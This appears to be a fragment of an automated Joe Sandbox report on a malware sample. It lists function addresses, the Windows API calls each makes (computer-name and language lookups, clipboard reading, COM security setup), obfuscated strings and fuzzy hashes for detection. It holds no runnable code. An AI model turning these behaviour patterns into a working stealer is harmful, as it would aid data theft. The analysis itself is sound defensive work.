GetCurrentThreadId.KERNEL32 ref: 00408727
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00408738
GetForegroundWindow.USER32 ref: 004087CC
ExitProcess.KERNEL32 ref: 0040880B

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
String ID:
API String ID: 4063528623-0
Opcode ID: 4e6b60e15db8346b87a15e97a1c4fea7d725817accabe946b797099010adcc2e
Instruction ID: 7898d610b8b9a67522257c9ee486d783a58c5f04e9cbb592a6b001696d4b01d9
Opcode Fuzzy Hash: 4e6b60e15db8346b87a15e97a1c4fea7d725817accabe946b797099010adcc2e
Instruction Fuzzy Hash: 262164B1A402008BD7143F709E0A71677919F43716F258A3EE8E1BB3E7EA3C4801879E

Function 0040C93F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040C951
CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040C972

Strings

I}, xrefs: 0040C978

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID: InitializeSecurity
String ID: I}
API String ID: 640775948-454040721
Opcode ID: 24b880f7a0c911c4f3f00a54eb0ea71d99ad2dc1c2ee2158177c278956202a37
Instruction ID: 3746464648809fb258fe21d1e91771d3bac83fe2bb28d0741c317fb80ee58e5f
Opcode Fuzzy Hash: 24b880f7a0c911c4f3f00a54eb0ea71d99ad2dc1c2ee2158177c278956202a37
Instruction Fuzzy Hash: 4FE042787C83117BF6799B54ED57F1432256B86F22F344314B7253D6E58AE03201851C

Function 0043E87C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetForegroundWindow.USER32 ref: 0043E87C
GetForegroundWindow.USER32 ref: 0043E88D

Strings

Hhg, xrefs: 0043E89E

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID: ForegroundWindow
String ID: Hhg
API String ID: 2020703349-4281995326
Opcode ID: c73eb67316fab12a850df1827bdb3a0c6f9c170d2b6a60973d365e601d6e8639
Instruction ID: 4f26cf2b5c18bb3a291164ce3ff766b01ce0290b13cab42f3178c452901b16e7
Opcode Fuzzy Hash: c73eb67316fab12a850df1827bdb3a0c6f9c170d2b6a60973d365e601d6e8639
Instruction Fuzzy Hash: 94D05EFCF001415BCA049B62FC3A40B3715F74624BB044439E80683326D539B908898A

Function 0042C83F Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNELBASE(00000005,?,00000100), ref: 0042C90B

Strings

TSQX, xrefs: 0042C879

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID: ComputerName
String ID: TSQX
API String ID: 3545744682-3452003027
Opcode ID: 63c7a978150d1fbdbe2c47e40c4d1fe69bb0f8992fb744aaffac664a8333eb22
Instruction ID: 97ba868bcd7f693b0a38a1f86840dfde38788ca9cb99172f5da8b28385effe2d
Opcode Fuzzy Hash: 63c7a978150d1fbdbe2c47e40c4d1fe69bb0f8992fb744aaffac664a8333eb22
Instruction Fuzzy Hash: 8A21A13060D3D18AEB3A9F34C4647FBBBE59F96301F58896ED0C987282CB788105D756

Function 0042C83D Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNELBASE(00000005,?,00000100), ref: 0042C90B

Strings

TSQX, xrefs: 0042C879

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID: ComputerName
String ID: TSQX
API String ID: 3545744682-3452003027
Opcode ID: b9a88071d041905c3b54c058061ead113a648a15ce61b6515701cf068e2c4d7d
Instruction ID: 71bc51f78e56c51d47d95835eb252843816a36485ddd6fd3f4f00016666188c6
Opcode Fuzzy Hash: b9a88071d041905c3b54c058061ead113a648a15ce61b6515701cf068e2c4d7d
Instruction Fuzzy Hash: D511C1706193908BEB399F34C4687EFBBD69BC6301F19896DD0C9CB281CB788105DB56

Function 00437647 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetUserDefaultUILanguage.KERNELBASE ref: 0043766A

Strings

YEBC, xrefs: 00437692

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID: DefaultLanguageUser
String ID: YEBC
API String ID: 95929093-3431656882
Opcode ID: a46c18300cafc465af0690476a1889a96d3f729e52a61b51f52bf86cdac35057
Instruction ID: 5a5000ae83b20ec24457bd16609dc6f7a0f6320969e90cb5dbcf98a9148123d7
Opcode Fuzzy Hash: a46c18300cafc465af0690476a1889a96d3f729e52a61b51f52bf86cdac35057
Instruction Fuzzy Hash: 0611C176E096548FDB09CF79C9607AD7BF16B6E300F0980ADD48AA7391CE3949048B65

Function 0042C733 Relevance: 3.1, APIs: 2, Instructions: 85COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?), ref: 0042C765
GetComputerNameExA.KERNELBASE(00000006,05281AC4,00000100), ref: 0042C81B

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID: ComputerFreeLibraryName
String ID:
API String ID: 2904949787-0
Opcode ID: b9ef4174a4dc21d234d06e07584d453dc60bcd490c9eacbdbaf8019bc9d75f3d
Instruction ID: e87843e4dfe76bf26891a51d53472c3e6298df943f482ad86ee0f63d197f7c1e
Opcode Fuzzy Hash: b9ef4174a4dc21d234d06e07584d453dc60bcd490c9eacbdbaf8019bc9d75f3d
Instruction Fuzzy Hash: B721F27420C3919ADB298F35D4643FE7BE1AFA7300F88486ED0CA97292DB784106CB56

Function 0042C731 Relevance: 3.1, APIs: 2, Instructions: 65COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?), ref: 0042C765
GetComputerNameExA.KERNELBASE(00000006,05281AC4,00000100), ref: 0042C81B

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID: ComputerFreeLibraryName
String ID:
API String ID: 2904949787-0
Opcode ID: 40c92bad30daaf6ffd203066b1da09ecd7efcc358df2686faa4aa1a231c9fadc
Instruction ID: aa62c163b9084a224c1216cb80a38010f92c844698c1c785ed28fbf87cc31de8
Opcode Fuzzy Hash: 40c92bad30daaf6ffd203066b1da09ecd7efcc358df2686faa4aa1a231c9fadc
Instruction Fuzzy Hash: BD1122782083819FCB298F34D8A43BE7BE1AFA6300F48486ED0CA97291DB744106CB52

Function 0042C6ED Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNELBASE(00000006,05281AC4,00000100), ref: 0042C81B

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: a68730fe877fc416a6bb5e17fc3ce3261b8902795b7843f1875e9d5c69117320
Instruction ID: d61f1072a0969e7a66acfcf30763784437b07475cf43834dfaaa4fb5921a4486
Opcode Fuzzy Hash: a68730fe877fc416a6bb5e17fc3ce3261b8902795b7843f1875e9d5c69117320
Instruction Fuzzy Hash: A71123B82093819AC7298F35D8A03FF7BE1AFA7300F58486ED0CAD7291DB744106CB56

Function 0043D8E0 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,00000000,0040B6E1,00000000,00000001), ref: 0043D912

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: d38626d37e052fb4f55849f104130760729e14c8b3fa68709f5574a891d1a7e0
Instruction ID: d19f92d431edb0342907fe441d40d09edb07ee05f7232ba1a69438fa291609f6
Opcode Fuzzy Hash: d38626d37e052fb4f55849f104130760729e14c8b3fa68709f5574a891d1a7e0
Instruction Fuzzy Hash: 79F0F6BA814515EBC7003B39BC06A1B36A4EF8B355F0514BAF50552121DB39E801D6EA

Function 00431F12 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 00431F59

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: bbd8b9a3efd4767b79b0a5ce858f4791f1dd15878c76960c5737e2daabc7ebad
Instruction ID: 2e7eea79343bead8608811b147fd4e822512d5c4717c1b43b50971d1995478ea
Opcode Fuzzy Hash: bbd8b9a3efd4767b79b0a5ce858f4791f1dd15878c76960c5737e2daabc7ebad
Instruction Fuzzy Hash: C001E7B85093418FE360DF19C598B4ABBF1BBC4304F14C91DE48487390DF7995488F82

Function 0042E895 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 0042E8DE

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 0e2486e03ddf3f6eec898af7fc8e1e3cdcf987106eb8ef783ba3c25f5bcab895
Instruction ID: 698274b8f42c793e8ac5b98cf92d0455441ccb7556a2ebb9311f789b793bc8e5
Opcode Fuzzy Hash: 0e2486e03ddf3f6eec898af7fc8e1e3cdcf987106eb8ef783ba3c25f5bcab895
Instruction Fuzzy Hash: 04F0DAB4109701CFD304EF68D5A871ABBF0FB89304F10881CE5958B3A0C776AA08CF82

Function 0040C8D0 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C8E3

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 745e886bb64db748b00b1f74c6f76b6f84ba77ccf119b4913f35b528d2d8a7ce
Instruction ID: ba45151629721573d1e867463af21bfb29369c9cc6edaff969acdb11820127f3
Opcode Fuzzy Hash: 745e886bb64db748b00b1f74c6f76b6f84ba77ccf119b4913f35b528d2d8a7ce
Instruction Fuzzy Hash: D3D0A7345946486BD314771CEC47F17375C9343755F400238F262DA2D3DD506910C669

Function 0043BC00 Relevance: 1.5, APIs: 1, Instructions: 15memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000,?,0042169F,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0043BC20

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 2660612d26db1bcfcbf314a6b6debdb7b7beff9595741d37e950765016bc011c
Instruction ID: 3fb7ea048fe862cd413cd0973453d6f0d943ae68d3a351da8e8434a786bbb282
Opcode Fuzzy Hash: 2660612d26db1bcfcbf314a6b6debdb7b7beff9595741d37e950765016bc011c
Instruction Fuzzy Hash: 05D0C931415122EBCA502F18BC15BCB3B54AF4A361F0B08A2B5046A075C665EC91DAD8

Function 0043BBE0 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,0040876C,?,0040876C), ref: 0043BBF0

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: f4cd2198894bee7e8dcce7ff43bfd595e7221b3a6ba3f232ad572940803e431f
Instruction ID: aee00025be20e00b4e0d6da119e4a0732a3eedf8165af1979d285b47108d1b23
Opcode Fuzzy Hash: f4cd2198894bee7e8dcce7ff43bfd595e7221b3a6ba3f232ad572940803e431f
Instruction Fuzzy Hash: 4AC04C31445121ABC5106B15FC09BC67B549F45361F0100A6B104670718661AC828A98

Non-executed Functions

Function 00433440 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 147clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00433450
GetClipboardData.USER32 ref: 0043346B
GlobalLock.KERNEL32 ref: 00433484
GetWindowLongW.USER32 ref: 004334EC
GlobalUnlock.KERNEL32 ref: 00433629
CloseClipboard.USER32 ref: 00433634

Strings

-, xrefs: 00433511
(, xrefs: 0043351B
@, xrefs: 0043353E
+, xrefs: 00433525

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
String ID: ($+$-$@
API String ID: 2832541153-3554917468
Opcode ID: b80490c1aa47f4d13cfbb17de41734a2846cacceb130b9eca04d4013d3788c34
Instruction ID: 4833ead9baec935d1e47f7a0176fd7ab4cc90e77a64882814c11484b737bc4f0
Opcode Fuzzy Hash: b80490c1aa47f4d13cfbb17de41734a2846cacceb130b9eca04d4013d3788c34
Instruction Fuzzy Hash: 7A51237150C7848FD300EF78984932FBED19B95325F094A3EE4E5873D1EA78864A935B

Function 0041D9D0 Relevance: 14.6, Strings: 11, Instructions: 896COMMON

Download Yara Rule

Strings

I, xrefs: 0041DBD9
6Cjz, xrefs: 0041DD94
L@EE, xrefs: 0041DCE8
Z[CD, xrefs: 0041DCE0
Q$, xrefs: 0041DD00
WCSW, xrefs: 0041DCF8
czgw, xrefs: 0041DD18
9?, xrefs: 0041E359
OVK[, xrefs: 0041DCD0
MKYT, xrefs: 0041DCC8
w, xrefs: 0041DD60

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID:
String ID: 6Cjz$9?$I$L@EE$MKYT$OVK[$Q$$WCSW$Z[CD$czgw$w
API String ID: 0-629887381
Opcode ID: f70a8035d3e6d300d3a83a7bba1cb06e82199934d555bbc632b95ad55875e646
Instruction ID: f00123da2842d88c2895a34344b646ae639268db71afc8bac51acf6c4a6f6c42
Opcode Fuzzy Hash: f70a8035d3e6d300d3a83a7bba1cb06e82199934d555bbc632b95ad55875e646
Instruction Fuzzy Hash: AA527D7490C3908FC721CF25C8507AFBBE1AF95314F08866EE8E95B392D7398946CB56

Function 00408E50 Relevance: 11.5, Strings: 9, Instructions: 256COMMON

Download Yara Rule

Strings

vfdk, xrefs: 00408EDE
cX?v, xrefs: 00408EEE
-, xrefs: 00408F16
ndn-, xrefs: 00408EF6
$_, xrefs: 00408EA3
srb~, xrefs: 00408ECE
|nzc, xrefs: 00408EE6
q?Ga, xrefs: 00408ED6
uG[E, xrefs: 00408EFE

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID:
String ID: $_$-$cX?v$ndn-$q?Ga$srb~$uG[E$vfdk$|nzc
API String ID: 0-2482235978
Opcode ID: 833e9d7832c33974310b6282963fba8c1f8a1d80212765be31ff528a5ee5e842
Instruction ID: 29f5885c2b097f52bf3417a0236118fd35edc22a81fc5c48a22b5321f092059f
Opcode Fuzzy Hash: 833e9d7832c33974310b6282963fba8c1f8a1d80212765be31ff528a5ee5e842
Instruction Fuzzy Hash: F871066150C3828BD305CB398560767FFE19FE3214F284A6EE4D59B392D7398909875A

Function 00429E35 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 498COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,?), ref: 00429E5A

Strings

D[, xrefs: 0042A2B4
a`th, xrefs: 0042A28C
#"! , xrefs: 00429F93
syjQ, xrefs: 0042A29C

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: #"! $D[$a`th$syjQ
API String ID: 237503144-2004775968
Opcode ID: 7b9f3a07e5d2b1588de4e0f1c48d61f133e26d9c9ae25bf0cecb677ce69e630f
Instruction ID: 9c95ed4adec4f6f90933a18f6988ef8cfba51791e001f28754dcd87738f03a5d
Opcode Fuzzy Hash: 7b9f3a07e5d2b1588de4e0f1c48d61f133e26d9c9ae25bf0cecb677ce69e630f
Instruction Fuzzy Hash: 0E020174608350DFD3109F28E88176BB7E1AB8A318F444ABDF9C547292D7398D1ACB5A

Function 00426090 Relevance: 9.2, Strings: 7, Instructions: 487COMMON

Download Yara Rule

Strings

>\1B, xrefs: 00426252
Y D&, xrefs: 00426205
I<!c, xrefs: 0042626D
/@AF, xrefs: 0042625D
#"! , xrefs: 004263E7
O0v6, xrefs: 004261D9
#"! , xrefs: 00426533

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID:
String ID: #"! $#"! $/@AF$>\1B$I<!c$O0v6$Y D&
API String ID: 0-445666088
Opcode ID: 75da7cb73f9f1abee9753ebe9669fd4c39f56e2fe988c17bf0783b989343e745
Instruction ID: 00fe87d95f29aebd86013c07aafa4fc88c760012df1282c019cc5e5b076ddc75
Opcode Fuzzy Hash: 75da7cb73f9f1abee9753ebe9669fd4c39f56e2fe988c17bf0783b989343e745
Instruction Fuzzy Hash: 32F1FFB460C344DFE7248F24E89072FBBB1FB82304F45486DE6D95B251E738990ACB5A

Function 00423720 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 319COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000), ref: 00423838
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?), ref: 004238C5

Strings

QC, xrefs: 0042392C, 00423940, 00423989
z[B, xrefs: 00423BE8, 00423C15
:B, xrefs: 00423AD0

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: QC$z[B$:B
API String ID: 237503144-2471469230
Opcode ID: 6682a68a48b28a8fa80783c932dc4ffd5b5330e6ad58b4537432524558535710
Instruction ID: e267a624231d1689b5f52eb413fe343a07d4896ee2248a2026ce614f1bdd9114
Opcode Fuzzy Hash: 6682a68a48b28a8fa80783c932dc4ffd5b5330e6ad58b4537432524558535710
Instruction Fuzzy Hash: 63A111B560C3009FE320CF25DC4175BBBE5EB86314F10483DFA959B291D77A990ACB8A

Function 00419970 Relevance: 8.2, APIs: 2, Strings: 2, Instructions: 1151COMMON

Download Yara Rule

APIs

Part of subcall function 0043D970: LdrInitializeThunk.NTDLL(00440DBD,00000002,00000018,?,?,00000018,?,?,?), ref: 0043D99E

FreeLibrary.KERNEL32(?), ref: 00419EC6
FreeLibrary.KERNEL32(?), ref: 00419F2B

Strings

:93;, xrefs: 00419972
FG, xrefs: 00419C9D

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID: FreeLibrary$InitializeThunk
String ID: :93;$FG
API String ID: 764372645-41819261
Opcode ID: 169ecdbd419e7908b990b29e51c6170e5c77068b7e597f1340c6e5189698b2b2
Instruction ID: 32231d06f9a10d06a7cfd48649e1b503e42a2300a2bb23f7736d0d1badc55784
Opcode Fuzzy Hash: 169ecdbd419e7908b990b29e51c6170e5c77068b7e597f1340c6e5189698b2b2
Instruction Fuzzy Hash: 578226746093409BE7248B24C894BABBBE2EFD5314F28882DE5C547352D739DC96CB4B

Function 00417E2E Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 538COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,-00000001,00000000,00000000,?), ref: 00418186

Strings

}~, xrefs: 004183CB
}{, xrefs: 004183C3

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: }{$}~
API String ID: 237503144-750507644
Opcode ID: 4523f89c0784cc2d44093adb829dad02dced3539e37ad648681613bc814ba41b
Instruction ID: f2fe4e0d90c10b3acead804b663dae101d32e74fe35640768fe7290a4f66f5e4
Opcode Fuzzy Hash: 4523f89c0784cc2d44093adb829dad02dced3539e37ad648681613bc814ba41b
Instruction Fuzzy Hash: 9D02F7755083228BC720CF29C4906ABB7F1EFD5754F19996EE8C99B360EB388C42C756

Function 0041850C Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 343COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?), ref: 00418557

Strings

}~, xrefs: 004183CB
}{, xrefs: 004183C3

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: }{$}~
API String ID: 237503144-750507644
Opcode ID: 489a455eae039459d5f59a8a863c0ad09ce2d05f5f0eff4e77c70c765d16f7c7
Instruction ID: cdd5dc2489ab5cd6b838cbdd6501a5f5998a665d6a058193ed3c477a99a17239
Opcode Fuzzy Hash: 489a455eae039459d5f59a8a863c0ad09ce2d05f5f0eff4e77c70c765d16f7c7
Instruction Fuzzy Hash: 3DA126795083528BC724CF24C8806BBB7F1EF85764F19496EE8C997390EB38C882C756

Function 004239C0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 249COMMON

Download Yara Rule

Strings

QC, xrefs: 0042392C, 00423940, 00423989
z[B, xrefs: 00423BE8, 00423C15
:B, xrefs: 00423AD0

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID:
String ID: QC$z[B$:B
API String ID: 0-2471469230
Opcode ID: 7b3e2799ce009fe4f4aa5e7be6138732dfbcd7886255463f1a74577a9e8e99ed
Instruction ID: 09c64748da38a1aabb966a404f278b2d8b9d2d28b263df5e954f2641f6299216
Opcode Fuzzy Hash: 7b3e2799ce009fe4f4aa5e7be6138732dfbcd7886255463f1a74577a9e8e99ed
Instruction Fuzzy Hash: 9081F2B560C341DFE3208F25EC41B9BB7E4EB86318F10493DFA9897291D7759906CB8A

Function 00423B80 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 215COMMON

Download Yara Rule

Strings

QC, xrefs: 0042392C, 00423940, 00423989
z[B, xrefs: 00423BE8, 00423C15
:B, xrefs: 00423AD0

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID:
String ID: QC$z[B$:B
API String ID: 0-2471469230
Opcode ID: 7fdf529d3daf414f316fcdfe247d0719d1900e7154b92efdb338e2a576acc7ea
Instruction ID: 761431d4f8970111b50bdaf70c7d1dcd9d567b5d8ef7e209b8c7745a99eb3397
Opcode Fuzzy Hash: 7fdf529d3daf414f316fcdfe247d0719d1900e7154b92efdb338e2a576acc7ea
